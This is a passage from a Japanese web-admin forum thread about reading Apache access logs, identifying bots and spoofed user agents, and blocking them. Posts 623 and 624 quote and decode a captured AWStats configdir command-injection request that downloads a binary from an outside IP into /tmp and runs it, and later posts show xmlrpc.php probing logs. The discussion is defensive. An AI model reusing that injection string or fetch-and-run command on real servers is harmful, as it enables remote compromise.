574 :DNS未登録さん:2005/07/02(土) 10:30:44 ID:???
>>572
JPNIC の WHOIS で直ちに判明するけど?

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.114.82.0/23
b. [ネットワーク名] OCT-NET
f. [組織名] 株式会社大垣ケーブルテレビ
g. [Organization] Ogaki Cable Television Co.,Inc.
m. [管理者連絡窓口] MT2103JP
n. [技術連絡担当者] MT2103JP
p. [ネームサーバ] name.ogaki-tv.ne.jp
p. [ネームサーバ] name2.ogaki-tv.ne.jp
[割当年月日] 2000/11/28
[返却年月日]
[最終更新] 2002/02/25 15:52:47(JST)


575 :572:2005/07/02(土) 13:06:52 ID:???
>>574 さんありがとうございます。
最近サイバーエリアサーチに頼りすぎてました(お恥ずかし・・
しかし、以前にADSLで運営していた頃は自分のアドレスが故に
211.*.*.*218.*.*.*付近などの見知らぬアクセスが多かったのですが
同時に公開先も同じ範囲を動的で使っているんで弾けませんでした。
今度は私も61.*.*.*で鯖プランで運用しているのですが572で記したのを
含む61.*.*.*の見知らぬアクセスが多く、ただ公開先にはいないので
クラス自体を弾こうと思います。
一般公開運営するほど知識がない者なので分かりませんが
スキャンなのかどうか、ログ見ると自分のアドレスの周りからの
アクセスが非常に多いのが気になります。被害はないので構いませんが。

576 :DNS未登録さん:2005/07/02(土) 14:23:36 ID:???
>>575
非公開なんだったら、BASIC認証でもかけたら?

577 :DNS未登録さん:2005/07/02(土) 20:02:57 ID:???
最近、リファラに得ろサイトがやたら出てくるんだけど、何でだろ。

578 :572:2005/07/02(土) 20:21:19 ID:???
>>576
BASIC認証は親戚や兄弟で共有する個人的な写真とかをうpしてる
ところにはかけてあります。
トップとかは見られてもフーンくらいで終わっちゃうかもなんで・・
折角$ENV{"REMOTE_USER"}でユーザーごとに遊んでいるんで
トップから認証かけてみますね。


579 :DNS未登録さん:2005/07/02(土) 20:24:44 ID:???
>>577
refererで宣伝してるんだよ。

580 :DNS未登録さん:2005/07/20(水) 23:43:53 ID:mkVYq4JU
p1178-ipad83marunouchi.tokyo.ocn.ne.jp からIE/4.0なんてUAできてるけど、これも
SPAM業者かな?

581 :DNS未登録さん:2005/07/21(木) 08:21:30 ID:???
>>580
そうでしょう
http://antispam.blfan.org/exhibit/zenshinkyouA.htm#get-address

582 :DNS未登録さん:2005/08/02(火) 13:44:29 ID:???
本物かどうか分からないけど、こんなのが来た。
Mozilla/4.0 (PSP (PlayStation Portable)

583 :DNS未登録さん:2005/08/05(金) 14:00:44 ID:???
>582
本物なら、そんな頭悪そうな UA 付けないと思う。

584 :DNS未登録さん:2005/08/05(金) 22:11:35 ID:???
括弧の数があってないよw

585 :DNS未登録さん:2005/08/11(木) 22:29:45 ID:FG9Xied6
日別でかつページ別でかつ、できればその中で携帯キャリア
別(DoCoMo、vodafone、au)に統計を取れるアクセスログ解析
ツールというものはありますでしょうか。

色々と探してみましたが、フリーはもちろん、有料のものでも
ここまでできるものは見つかりませんでした。

検索能力不足ということも重々承知しておりますが、もしも
良いものがございましたらご教示いただきたい次第です。

乱文ではございますが、宜しくお願いいたします。

586 :DNS未登録さん:2005/08/11(木) 22:37:41 ID:???
OSとか環境を書きなよ。窓なら>>1のを使ってみれば?

587 :DNS未登録さん:2005/08/11(木) 22:47:16 ID:???
有料なら http://www.sitetracker.jp/ とかいいんでないか?

588 :585:2005/08/11(木) 22:48:18 ID:???
すみません。
そうですよね。大事なことを書き忘れておりました。

OSはLinux(Redhat9)です。
アクセスログはApache1.3のcommonで取っております。

宜しくお願いいたします。

589 :DNS未登録さん:2005/08/11(木) 23:35:25 ID:???
てきとーなスクリプト書いて必要なログだけ取り出せばええやん。


590 :585:2005/08/11(木) 23:39:48 ID:???
>>586
ご返答有難うございます。
AnalogやWebalizerのような、サーバ内処理でHTML生成
するようなものをイメージしてましたが、クライアントPCで
解析させる方法もあるんですね。

ログのダウンロードは原則禁止となっているので今回は
できなさそうですが、今後の検討要素として入れておき
たいと思います。有難うございました。

>>587
ご返答有難うございます。
良さそうですね。
ページ別キャリア別に取れるかがキーとなりますが、実際
トライアル版を入れて検証してみたいと思います。

>>589
ご返答有難うございます。
もしも要件を満たすものがなければそのようになる予定です。
とりあえず明日の会議にて各種提案し、決定する流れでご
ざいます。

591 :587:2005/08/11(木) 23:58:42 ID:???
>>590
といっても実はまだ使ってないので、
もし検証できたら、どんな感じかレポしてみてくださいな。


592 :DNS未登録さん:2005/08/12(金) 05:18:31 ID:???
CommonだとIPアドレスベースで判断かな?
i-modeやezwebはいいがvodaのIPアドレス範囲よくわかんね、俺w

593 :585:2005/08/13(土) 03:42:40 ID:???
とりあえず色々と見てみて、試せるものは試してみました。
以下、調べたソフトです。

■無料
Analog
Webalizer
Webdruid
Awstats
dopvSTAR*
PPhLogger
ApacheLogViewer

■有料
SiteTracker
WebTrends
Urchin
ClickTracks
AccessProbe
eIQ LogAnalyzer
weblog expert

結果から申し上げますと、「日ごと、ページごと」の集計はできないに
等しいのではないかという結論に至りつつあります。
(例:8月12日:hogehoge.html・・・5757アクセス)

やはり負荷や集計時間等を考えると、無理に近いのでしょうかね。
何とか探したいと連休だけ猶予はもらいましたが、多少諦めモード
はいってます。とにかくもう少し探しています。

594 :DNS未登録さん:2005/08/13(土) 09:17:35 ID:???
>>593 操作端末がWin機だとして >>1 のでできるんじゃね?
ログを開いて下にある Statics を押下。んで上のペインのタブはURL、
下は、dayなりHostなりAgentなりを選択すればいいような希ガス。

595 :DNS未登録さん:2005/08/13(土) 14:33:27 ID:???
サイトいじれるなら全ページにSSIで解析ツール埋め込むとか。

596 :DNS未登録さん:2005/08/28(日) 02:14:17 ID:???
Webalizerを使っている方にお伺いしたいのですが、
Total Entry Pagesの部分に、自分の管理していないページが出ているんですが、
(1個だけ、http://www.xxxxxxって出てきてます)これって普通なのですか?
なんかヤヴァイ状況なのですかね?

597 :DNS未登録さん:2005/08/28(日) 14:45:03 ID:???
俺そんなのでないよ。

598 :DNS未登録さん:2005/08/28(日) 17:12:05 ID:???
>>596
来てるよ
Apacheのログ見ると明らかにうちのドメインじゃないリクエストあるし

599 :DNS未登録さん:2005/08/28(日) 22:26:10 ID:???
ただの proxy 探りじゃないの?
生ログあるなら >598 がちゃんと調べてくれ。


600 :DNS未登録さん:2005/08/30(火) 00:44:06 ID:???
単にロボットがHTMLリクエストの組み立てを間違ったんだと思う。
ウチにもときどきある。

601 :600:2005/08/30(火) 02:33:43 ID:???
まちがった。
×誤 HTMLリクエスト
○正 HTTPリクエスト


602 :DNS未登録さん:2005/09/22(木) 22:26:23 ID:???
ほしゅほしゅ。 UA1.0は来続けていますよー。

> 09/17(SAT)07:35
> 61.124.193.244 (ntchba014244.chba.nt.adsl.ppp.infoweb.ne.jp)
> 1.0

> 09/17(SAT)08:02
> 219.37.72.27 (YahooBB219037072027.bbtec.net)
> 1.0

603 :DNS未登録さん:2005/09/24(土) 02:03:51 ID:???
久々参戦。

RemoteIP 210.173.180.157
UserAgent DoCoMo/2.0 P900i(c100;TB;W24H11)
ていうのから大量アクセスが。きっと UA 偽装だよね。
docomo.ne.jp じゃないのに UA が DoCoMo のやつを拒否することにした。

1.0は相変わらずでございます。
http://chronoflyer.ddo.jp/open/spam_log

604 :DNS未登録さん:2005/09/30(金) 00:42:50 ID:L7Y77mzD
>docomo.ne.jp じゃないのに UA が DoCoMo のやつを拒否することにした。

そういう複雑な条件って、どうやって設定するの?

605 :DNS未登録さん:2005/09/30(金) 03:51:13 ID:+mal3bLD
>>604
mod_rewrite は使えるようになってます?

RewriteCond %{REMOTE_HOST} !docomo\.ne\.jp$
RewriteCond %{HTTP_USER_AGENT} ^DoCoMo
RewriteRule (^.*$) - [F]

ていうルールを追加すればいけます。
末尾に [OR] をつけなければ条件を絞り込めれるので。

http://www.math.tohoku.ac.jp/~kuroki/keijiban/Robots.html
とかを参考に。

mod_rewrite は --enable-rewrite オプションを追加して
Apache をリコンパイルすると使えるようになります。

606 :DNS未登録さん:2005/10/01(土) 13:35:26 ID:???
さくらインターネットが昔やってたやつのようにアカウント毎のPV数をランク化させたいのですが
そういう集計て出来ますか?

例えば a と b が居たらとりあえずそのアクセスログが欲しいんです。
集計表示は自分で組もうとおもっていますので生ログさえあれば満足なのですがそういう取り方は可能でしょうか。

607 :DNS未登録さん:2005/10/01(土) 14:07:49 ID:w2wzcVra
PV数だけでならば、単にアカウントごとのログファイル容量比較をすればよいのでは?

608 :DNS未登録さん:2005/10/01(土) 14:23:17 ID:???
>例えば a と b が居たらとりあえずそのアクセスログが欲しいんです。

おいおい、その a と b ってのは、他 人 なのか?

609 :DNS未登録さん:2005/10/01(土) 15:07:03 ID:???
スミマセン; 後で自分で読み返してみても変な文章でした(汗

>>607
アカウント毎にアクセスログて生成されてましたっけ?

>>608
アカウントAとアカウントBという意味でした_| ̄|○

その後結局LogFormatでApacehにログを生成させるとこまではこぎつけました。
ただ、これはアクセスをひたすら記録するのでアカウント毎の集計が非常に非効率的なことになっています。

home/*/のようにアカウント毎にログが出力できればベストなのですが・・・。

610 :DNS未登録さん:2005/10/01(土) 17:05:35 ID:???
アカウント毎のログは結構需要あるんかな

fgrep '~アカウントA' <logfile>って事じゃないのよね?

611 :DNS未登録さん:2005/10/02(日) 05:46:23 ID:j5GlHieR
>>609
>>1のApacheLogViewerじゃ駄目なの?

ランク化だけなら webalizer でもできるが。
http://www.ahref.org/webalizer.html

612 :611:2005/10/02(日) 05:49:40 ID:???
ごめん。集計表示は自分で組みたいのね。失礼

613 :DNS未登録さん:2005/10/02(日) 22:24:22 ID:vpuh0sz2
>>609
>>1のサポートBBSでこんな回答を見つけたけど、どうだろ。

> 【185-1】 Re: 直接リンク Referer の除外設定
> 2005/10/01 17:29 ▽ Circle 〔Home〕
>
> Apacheのログを分類して記録したい、ということであれば
> 下記のサイトが参考になると思います。
> http://shattered04.myftp.org/pc_25.html
> http://httpd.apache.org/docs/1.3/mod/mod_setenvif.html
>
> ApacheLogViewerでフィルターをかけたい、ということなら、
> 残念ながら、今のところそういう機能はありません。

614 :DNS未登録さん:2005/10/03(月) 00:48:39 ID:???
SetEnvIf と CustomLog を使えば静的には分割できるけど
動的(?)にはたぶん無理だよね

615 :607:2005/10/03(月) 10:28:13 ID:PtOhNsC6
んと、アカウント毎にサブドメインでVirtualHost設定し、各ユーザディレクトリにログを吐かせる。
それを利用するのが一番簡単なんじゃないかな?って事。
ログのファイル名は、
CustomLog "|/usr/local/sbin/rotatelogs /home/*****/log/httpdaccess-%Y%m%d.log 86400 540" combined
とかそんな感じで。

外してる?

616 :607:2005/10/03(月) 10:31:35 ID:???
連続スマソ
上記はFreeBSDでの例

617 :DNS未登録さん:2005/10/03(月) 12:58:44 ID:???
xamppならデフォでwebalizerがapacheなどとともにインスコされるそうだ
http://pc8.2ch.net/test/read.cgi/mysv/1128262593/

618 :DNS未登録さん:2005/10/08(土) 10:56:40 ID:mWhJMM8U
yahoobb221079171017.bbtec.net がユーザーエージェント無しで
HEAD メソッドだけでアクセスを繰り返してくるんだけど
なんじゃろか。リファラはあり。

619 :DNS未登録さん:2005/10/10(月) 22:44:23 ID:???
 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄


620 :nttkyo238198.tkyo.nt.adsl.ppp.infoweb.ne.jp:2005/10/10(月) 22:45:29 ID:???
 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄


621 :DNS未登録さん:2005/10/14(金) 08:32:00 ID:???
謎の1.0は去年の今頃がピークで、今年に入ってからだいぶすくなくなったから、あまり気に
とめていなかった。
11日にアップしたファイルにもう1.0のアクセスがあったのには、ちょっと驚いた。まだ、新規に
アクセス先を開拓してるんだ。アクセス元はc-able.ne.jp。

622 :DNS未登録さん:2005/10/15(土) 14:42:23 ID:ShsPirEP
少々スレ違いかもしれないが、最近 Inktomi の Yahoo!Slurp が
中国からもアクセスしてくるようになったことに気付いた。
最初はUA詐称かとも思ったが、ホスト名が lj9***.inktomisearch.com
(IP アドレスは 202.160.180.*)だから本物のようだ。

623 :DNS未登録さん:2005/11/11(金) 12:31:52 ID:???
最近、下記のアクセスがたまにあるんですがなんなのでしょうか?
GET /awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
 echo| - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
GET /cgi-bin/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
 echo| - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
GET /cgi-bin/awstats/awstats.pl configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;
 echo| - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 2
POST /blog/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /blog/xmlsrv/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /blogs/xmlsrv/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /drupal/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /phpgroupware/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3
POST /wordpress/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 64
POST /xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 2
POST /xmlsrv/xmlrpc.php - - 213.138.194.25 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) - - 404 0 3


624 :DNS未登録さん:2005/11/11(金) 13:02:49 ID:???
>>623
1行目のconfigdir=以下をURL decodeすると、
---
echo
echo YYY
cd /tmp
wget 24.224.174.18/listen
chmod +x listen
./listen 216.102.212.115
echo YYY
echo
---
となる。awstatsの脆弱性をついて、何か仕込もうとしたと思われ。

http://sourceforge.net/tracker/?group_id=13764&atid=113764
↑ここに無いとすれば、未発見の脆弱性の可能性もあり。


625 :624:2005/11/11(金) 13:07:43 ID:???
"awstats configdir vulnerability"をキーワードにしてぐぐったら
沢山見つかった。どうやら既知の脆弱性らしい。

http://www.google.co.jp/search?hl=ja&c2coff=1&q=awstats+configdir+vulnerability&spell=1

最新版を使っていれば多分大丈夫と思われるが、自分でも調べた方が
いいぞ。
#漏れは使ってないので、これ以上は面倒だから...


626 :624:2005/11/11(金) 13:12:23 ID:???
ちょっと気になったので、xmlrpc.phpの方もぐぐって見たら、
こっちでも一杯ひっかかる。気になったのはこれ:
http://izumino.jp/Blog/index.php?UID=1131275746

XML-RPC for PHP の脆弱性を突いた攻撃だってさ。
現在進行形のようだよ。


627 :624:2005/11/11(金) 13:20:25 ID:???
漏れの鯖にも似たようなエラーログが山のようにあった。
こりゃunix向けwormかねぇ?

% egrep 'xmlrpc|configdir' /var/log/httpd-dummy.error.log
[Wed Nov 09 03:07:39 2005] [error] [client 64.81.144.43] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Wed Nov 09 03:07:47 2005] [error] [client 64.81.144.43] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Wed Nov 09 03:07:50 2005] [error] [client 64.81.144.43] File does not exist: /usr/local/www/data-dist/xmlrpc
[Wed Nov 09 07:53:52 2005] [error] [client 203.208.241.87] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Wed Nov 09 07:54:00 2005] [error] [client 203.208.241.87] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Wed Nov 09 07:54:02 2005] [error] [client 203.208.241.87] File does not exist: /usr/local/www/data-dist/xmlrpc
[Thu Nov 10 16:33:40 2005] [error] [client 210.183.235.133] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Thu Nov 10 16:33:48 2005] [error] [client 210.183.235.133] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Thu Nov 10 16:33:51 2005] [error] [client 210.183.235.133] File does not exist: /usr/local/www/data-dist/xmlrpc
[Fri Nov 11 05:55:59 2005] [error] [client 193.91.48.251] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Fri Nov 11 05:56:08 2005] [error] [client 193.91.48.251] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Fri Nov 11 05:56:10 2005] [error] [client 193.91.48.251] File does not exist: /usr/local/www/data-dist/xmlrpc
[Fri Nov 11 06:45:09 2005] [error] [client 62.27.37.130] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Fri Nov 11 06:45:18 2005] [error] [client 62.27.37.130] script '/usr/local/www/data-dist/xmlrpc.php' not found or unable to stat
[Fri Nov 11 06:45:20 2005] [error] [client 62.27.37.130] File does not exist: /usr/local/www/data-dist/xmlrpc


628 :623:2005/11/13(日) 18:50:36 ID:???
624様、ありがとうございました。
PHPは使っていないのでOKかな。
ついでにリンク先にあったExchangeServer2003SP2をダウンロード。

629 :DNS未登録さん:2005/11/27(日) 02:35:13 ID:Ur6vdYmE
おれんとこにもxmlrpc.phpのログが鬼の様にあってここに辿り着きました。
php解放しとかなくてよかった、、、、、

630 :DNS未登録さん:2005/11/27(日) 02:51:03 ID:???
確かにphp&awstats関連の攻撃が多いなぁ。
とりあえずawstats置いてるディレクトリを変えてパスワード要求するようにしといたんだけど。不安だ。


631 :DNS未登録さん:2005/12/03(土) 23:09:49 ID:???
favicon.ico取る時だけUAにゴミが入るブラウザが
最近増えたような気がする。

632 :DNS未登録さん:2005/12/06(火) 11:55:08 ID:???
>>569
ボットが *.em.gala.jp なので半年くらい前に 210.131.159.128/25 で
denyしつつ、Blogでコキ降ろしておいたんだが、ふとアクセスログ見たら、
*.nat.gala.jp の社員さんが検索エンジン経由でご訪問。
210.249.156.192/26 追加、っとw

633 :DNS未登録さん:2005/12/08(木) 08:42:43 ID:???
>>632
galaからのアクセスはじいたら、同じような傾向
(UserAgentとか、deflate/gzip圧縮転送に対応してない感じとか、アクセスパターンとか)
のアクセスが他のホスト(ocnやnttpcといった一般のプロバイダ)からあったんですけど、
>>632さんのところはどうですか?

634 :DNS未登録さん:2005/12/09(金) 09:22:11 ID:???
>>631
それLunascapeじゃなかったかな。
しかも下層のディレクトリのfaviconにまでアクセスしようとする。

635 :632:2005/12/10(土) 10:52:05 ID:???
>>633
うちはそういうのないなー。
ただ一般のユーザーと同じホストネーム(*marunouchi.tokyo.ocn.ne.jpみたいな)
利用してるなら気付いてないだけかも。
少し気をつけてチェキしてみる。

636 :DNS未登録さん:2005/12/15(木) 00:05:03 ID:???
アクセスログを見てたら、「*.em.gala.jp」という足跡(ホスト名)が幾つかありましてね。


637 :DNS未登録さん:2005/12/18(日) 15:39:28 ID:???
ポリシーもなにも掲げてないからキモイんだよな。

638 :DNS未登録さん:2005/12/21(水) 03:14:18 ID:???
zia-httpmirror/1.140 っていうUAを名乗るロボットがきた。
ディレイも無く再帰的に根こそぎアクセスしよる。
ぐぐっても配布元とかの情報が見つからないや。

639 :DNS未登録さん:2005/12/26(月) 00:26:03 ID:???
検索してみたが zia-httpmirror 評判悪いねw
ホストは *dyn.optonline.netなの?
予防的に弾いておくかな…。

640 :DNS未登録さん:2005/12/28(水) 21:06:12 ID:???
BecomeBot、ロボットのくせにリファラを吐いている・・・
おかげで、今まで知らなかったリンク元がいくつも分かったよ。

641 :DNS未登録さん:2006/01/05(木) 22:23:08 ID:???
BecomeBotも最近うるさいな。
robots.txtで弾こう…。
どうせ日本語サイトにゃ関係ない。

642 :DNS未登録さん:2006/01/20(金) 15:22:54 ID:???
おたくの会社から攻撃されてるって言われて、このアクセスログを渡されたんだが・・・。

[Tue Jan 17 16:37:25 2006] [error] [client XXX.XX.XXX.XXX] (63)File name too long: access to /forum/taxonomy/term/1/0/taxonomy/term/taxonomy/0/taxonomy/term/taxonomy/0/taxonomy/term/taxonomy/0/taxonomy/term/taxonomy/0/taxonomy/term/taxonomy/0/feed failed
こんなのが異常にあるんだと。

ちなみに、相手先がdrupalというCMS使ってるだが、それの不具合なんじゃないのかな・・・

643 :DNS未登録さん:2006/01/21(土) 03:50:42 ID:???
おたくの会社が踏み台にされてるか、本当の攻撃元がIP偽っているか
どっちか。

644 :DNS未登録さん:2006/01/21(土) 12:08:01 ID:???
>642-643
それapacheか何かのweb serverのログだろ?
TCPでIPアドレス偽装するのはかなり大変だから、踏み台にされている
に一票。

645 :DNS未登録さん:2006/01/21(土) 12:34:40 ID:???
galaからのアクセスがいっぱい来てる人はメール送れば巡回から外してくれるみたいだぞ。
http://netabbs.info/test/read.cgi/rinji/1092583700/215-

646 :642:2006/01/21(土) 14:56:48 ID:???
一応、会社調べたら、Googleデスクトップ使ってる奴がアクセスしている事がわかった。
見たサイトのRSSを勝手に拾って画面に出力する機能が絶えずRSSを拾いに言っているらしい。
攻撃されてると言ってるトコのサイト見てたら、フィードがループするようなページの作りの箇所があるんだが・・・。

647 :DNS未登録さん:2006/01/25(水) 22:26:26 ID:???
CDにダウンロードしてあるログを解析するには
どのようなソフトを使えばいいんですか?
何か1万件くらい入ってるらしいんですが。

648 :DNS未登録さん:2006/01/25(水) 22:43:21 ID:???
>>647
何のログだ


649 :647:2006/01/25(水) 22:47:55 ID:???
>>648
どこぞの企業のアクセスログです。
HPに組み込んで解析するソフトは扱ったことがあるんですが
CDに落としたものを解析するにはどうするかがわからないんです。

650 :DNS未登録さん:2006/01/25(水) 23:50:27 ID:???
>>649
おまえのしたい事がわからないんです。

651 :647:2006/01/26(木) 00:11:12 ID:???
>>650
どうも上手く説明できそうにないんで
自力でなんとかやってみます。
お手数かけました。

652 :DNS未登録さん:2006/01/26(木) 00:40:56 ID:???
>>1を読めばわかるだろ?

653 :DNS未登録さん:2006/01/26(木) 00:45:48 ID:???
http://www.vector.co.jp/vpack/filearea/winnt/net/www/host/index.html
http://www.vector.co.jp/vpack/filearea/win95/net/www/host/index.html

654 :647:2006/01/26(木) 02:01:35 ID:???
結局自力ではできませんでした…

ApacheLogViewerは使ってみたんですが
「このファイルは読み込めません」みたいなこと表示されるんですよ。
そもそもこのログデータ見やすく処理されてて生ログじゃないんです。
csv形式になっていてエクセルで開かれるんです。
こういうのもApacheLogViewer、analogなどで解析・集計できるんですか?

655 :DNS未登録さん:2006/01/26(木) 02:15:42 ID:???
ここはPC初心者板じゃないですよ

656 :DNS未登録さん:2006/01/26(木) 02:16:52 ID:???
そろそろコンサルタントでも雇う気になったらどうだ?

657 :DNS未登録さん:2006/01/26(木) 02:34:54 ID:???
>>647
バカは来るなよw

658 :DNS未登録さん:2006/01/26(木) 07:08:28 ID:???
つーか、それはある程度解析されたデータなんじゃないかと。

659 :DNS未登録さん:2006/01/26(木) 10:15:29 ID:???
じゃあエクセルで解析すれば良いではないですか

660 :DNS未登録さん:2006/01/26(木) 10:33:06 ID:???
sageでこれだけ続くとは
更新チェック先に入れてる人結構多いな

661 :DNS未登録さん:2006/01/26(木) 11:11:09 ID:???
UA1.0の時に入れました

662 :DNS未登録さん:2006/02/01(水) 12:33:35 ID:???
漏れもUA1.0の時に入れました。見に来たのは久々だけど。
しかしまだUA1.0続いてるんだね。そして未だに原因不明なのか…?

663 :DNS未登録さん:2006/02/06(月) 06:29:25 ID:???
最近でたらめなリファラが付いた1.0が時々来るな…

664 :DNS未登録さん:2006/03/04(土) 18:03:57 ID:ML3kbVcK
logrotateでfilename.1.gzのようなファイル名になりますが、1の部分をローテーとした日付にする方法を教えてください

665 :DNS未登録さん:2006/03/05(日) 00:21:16 ID:???
ルーク、telnetしてmvを使え。

666 :DNS未登録さん:2006/03/05(日) 01:33:38 ID:???
>664
つ [cronolog]

667 :DNS未登録さん:2006/04/02(日) 11:10:32 ID:???
1.0 、未だにコンスタントに届くな。
やっぱり日本国内の各地から……・。

668 :DNS未登録さん:2006/04/15(土) 03:39:34 ID:qv5dLNG5
10分置きにRSSチェックにくるの勘弁。
個人サイト相手に10分間隔ってDOS攻撃かよ、と突っ込みたくなる。

悪意のない初心者ユーザーなんだろうから、余計にやりにくい…。
法人ホストなら遠慮くなく弾くんだけどなぁ…。

669 :バッカーです ◆KeuXjwWDdE :2006/04/15(土) 12:57:43 ID:???
自意識過剰すぎ
1秒に10回ならともかく10分一回でなんでDoSなんだ?w
目つぶっと毛

670 :DNS未登録さん:2006/04/15(土) 17:25:50 ID:???
503出して一時的に叩き落せばいいじゃん?

671 :DNS未登録さん:2006/04/16(日) 05:25:43 ID:???
読解力のないアホがいる。

672 :DNS未登録さん:2006/04/16(日) 06:45:03 ID:???
そういや
XXXX://++++++++++++++++++++......
っていうリファラ送ってくるヤツがいて
ログが激しく見辛かった事があったのを思い出した。


673 :DNS未登録さん:2006/04/16(日) 06:56:12 ID:???
10分置きw
1人しかRSSチェッカーに登録してないってことだね

674 :DNS未登録さん:2006/04/16(日) 10:04:01 ID:???
生ログをApacheLogViewerで開こうとしてるんですが、
ログファイルが2.2GBもあるもんでApacheLogViewerで
エラーが出てしまいます。
ログファイルを分割してApacheLogViewerで開いたほうが
いいと思うんですが、何かいい方法ないでしょうか?

675 :DNS未登録さん:2006/04/16(日) 14:11:30 ID:???
>>674
ログファイルを分割してApacheLogViewerで開いたほうが
いいと思う。

いや、まじで。

676 :DNS未登録さん:2006/04/16(日) 15:36:01 ID:???
その分割する方法を教えてほしいんだが。

677 :DNS未登録さん:2006/04/16(日) 16:27:06 ID:???
>>674
rotatelog

678 :DNS未登録さん:2006/04/16(日) 20:27:56 ID:???
既にやっちゃった物ならsplitコマンドで別ければ?

679 :DNS未登録さん:2006/04/18(火) 23:53:48 ID:???
>>673
どういう解釈?

680 :DNS未登録さん:2006/04/19(水) 17:56:33 ID:ANVw1nho
http://www.google.co.jp/search?hl=ja&q=219.153.18.&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

219.153.18.xから頻繁にポートスキャンがあるのだが…

681 :DNS未登録さん:2006/04/19(水) 22:16:00 ID:???
>>680
うざい国からのアクセスを全て遮断
http://pc8.2ch.net/test/read.cgi/mysv/1118726898/

682 :DNS未登録さん:2006/04/19(水) 23:30:13 ID:???
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 232 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 206 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 215 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 216 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 216 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 213 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 210 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /ads/adxmlrpc.php HTTP/1.0" 404 210 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /xmlrpc.php HTTP/1.0" 404 204 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 211 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 211 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /blog/xmlrpc.php HTTP/1.0" 404 209 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /drupal/xmlrpc.php HTTP/1.0" 404 211 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /community/xmlrpc.php HTTP/1.0" 404 214 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /blogs/xmlrpc.php HTTP/1.0" 404 210 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:53 +0900] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 217 "-" "-"
